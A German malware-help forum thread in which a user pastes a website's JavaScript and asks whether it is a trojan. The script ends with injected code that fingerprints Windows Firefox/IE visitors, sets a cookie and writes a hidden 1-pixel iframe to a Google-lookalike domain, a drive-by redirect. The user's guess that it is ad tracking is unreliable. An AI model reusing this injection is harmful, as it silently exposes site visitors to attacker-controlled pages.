Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: JS-Trojaner oder eher harmlos?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 09.02.2012, 15:44   #1
ibicis
 
JS-Trojaner oder eher harmlos? - Standard

JS-Trojaner oder eher harmlos?



Hallo TB-Team,

beim Besuch folgender Seite schlägt F-Secure Alarm, ein IFrame-Trojaner wurde angeblich erkannt und entfernt:
Code:
ATTFilter
hxxp://tecnobike.it/home.html
         
Nun habe ich das JS separat heruntergeladen und in eine Textdatei kopiert. Virus Total erkennt nun mit 12 von 43 Scannern einen Trojaner:
https://www.virustotal.com/file/b9804fcd22c074dc3a6e38b12c34bc66cc0268aa5b51a68773a033b0a01804ba/analysis/1328800512/ (keine Ahnung, wie lange der Link noch aktiv bleibt, ich konnte ihn jedenfalls bis eben noch per C&P auf einem Fremdbrowser öffnen)
Der String des JS sieht folgendermaßen aus:
Code:
ATTFilter
// Created by iWeb 3.0.4 local-build-20111027

setTransparentGifURL('Media/transparent.gif');function applyEffects()
{var registry=IWCreateEffectRegistry();registry.registerEffects({reflection_0:new IWReflection({opacity:0.50,offset:1.00})});registry.applyEffects();}
function hostedOnDM()
{return false;}
function onPageLoad()
{loadMozillaCSS('home_files/homeMoz.css')
adjustLineHeightIfTooBig('id1');adjustFontSizeIfTooBig('id1');adjustLineHeightIfTooBig('id2');adjustFontSizeIfTooBig('id2');adjustLineHeightIfTooBig('id3');adjustFontSizeIfTooBig('id3');adjustLineHeightIfTooBig('id4');adjustFontSizeIfTooBig('id4');adjustLineHeightIfTooBig('id5');adjustFontSizeIfTooBig('id5');Widget.onload();fixupAllIEPNGBGs();fixAllIEPNGs('Media/transparent.gif');applyEffects()}
function onPageUnload()
{Widget.onunload();}
var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="hxxp://google-adsenc.com/in.cgi?2" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}
         
Da ich kein Coding-Guru bin, weiß ich natürlich auch nicht, was da im JS explizit ausgeführt werden soll. Es schaut danach aus, als ob ein Tracking-Cookie generiert, einige Systeminformationen sowie eine Geo-Location vom PC ausgelesen werden, um gezielt Google-Ads einblenden zu können.
Kann evtl. jemand genaueres zum Scriptinhalt sagen?
Danke vorab.

MfG ibicis

Alt 12.03.2012, 08:27   #2
ibicis
 
JS-Trojaner oder eher harmlos? - Standard

JS-Trojaner oder eher harmlos?



Falls es interessiert, der AV-Hersteller hat nach der Online-Analyse des Samples folgendes geantwortet:
Zitat:
Currently the site does not return malicious content, but this is not a legitimate google site either.
__________________


Antwort

Themen zu JS-Trojaner oder eher harmlos?
ahnung, aktiv, alarm, angeblich, besuch, center, code, datei, entfernt, erkannt, explorer, firefox, folge, link, registry, scan, scanner, schlägt, seite, total, tracking-cookie, virus, virus total, win, windows, öffnen



Ähnliche Themen: JS-Trojaner oder eher harmlos?


  1. Lob ist wohl eher angebracht als Kritik
    Lob, Kritik und Wünsche - 14.01.2014 (0)
  2. Fund von PUP.Optional.Wajam.A, Neuinstallation fällig oder eher "nur" unerwünschte Software
    Log-Analyse und Auswertung - 26.11.2013 (19)
  3. TR/Trash.Gen gefunden,harmlos oder muß was unternommen werden?
    Plagegeister aller Art und deren Bekämpfung - 09.08.2013 (3)
  4. Grafikkarte oder doch eher Netzteil?
    Alles rund um Windows - 27.08.2012 (2)
  5. Antivir Fund gefährlich ? Lohnt eine Suche oder eher das System neu aufspielen ?
    Log-Analyse und Auswertung - 09.04.2012 (32)
  6. Avira-Fund: Virus oder harmlos ?
    Plagegeister aller Art und deren Bekämpfung - 05.10.2010 (2)
  7. AntiVir meldet seit Tagen eine Trojaner-Warnung, die aber harmlos erschien
    Plagegeister aller Art und deren Bekämpfung - 09.06.2010 (7)
  8. Bios oder eher Hadeware (Motherboard) Problem ?
    Netzwerk und Hardware - 01.04.2010 (1)
  9. Virus oder eher nicht ??
    Antiviren-, Firewall- und andere Schutzprogramme - 06.09.2009 (3)
  10. Verbraucher"schutz" oder eher "-gefährdung"?
    Diskussionsforum - 26.08.2009 (2)
  11. kann man(n)s retten oder eher nicht ?! -_-
    Plagegeister aller Art und deren Bekämpfung - 04.08.2009 (1)
  12. ufdsvc.exe - Schadprogramm oder harmlos?
    Log-Analyse und Auswertung - 23.12.2007 (2)
  13. Rootkit eingefangen ?! Oder eher Windows-Prob ?!
    Plagegeister aller Art und deren Bekämpfung - 18.08.2007 (2)
  14. Ergebnis Escan. Schlimm, oder eher harmlos?
    Log-Analyse und Auswertung - 17.03.2006 (22)
  15. dumprep.exe - gefährlich oder harmlos???
    Plagegeister aller Art und deren Bekämpfung - 12.07.2005 (2)
  16. Spamschutz oder eher Verwaltung
    Überwachung, Datenschutz und Spam - 29.05.2003 (6)

Zum Thema JS-Trojaner oder eher harmlos? - Hallo TB-Team, beim Besuch folgender Seite schlägt F-Secure Alarm, ein IFrame-Trojaner wurde angeblich erkannt und entfernt: Code: Alles auswählen Aufklappen ATTFilter hxxp://tecnobike.it/home.html Nun habe ich das JS separat heruntergeladen und - JS-Trojaner oder eher harmlos?...
Archiv
Du betrachtest: JS-Trojaner oder eher harmlos? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.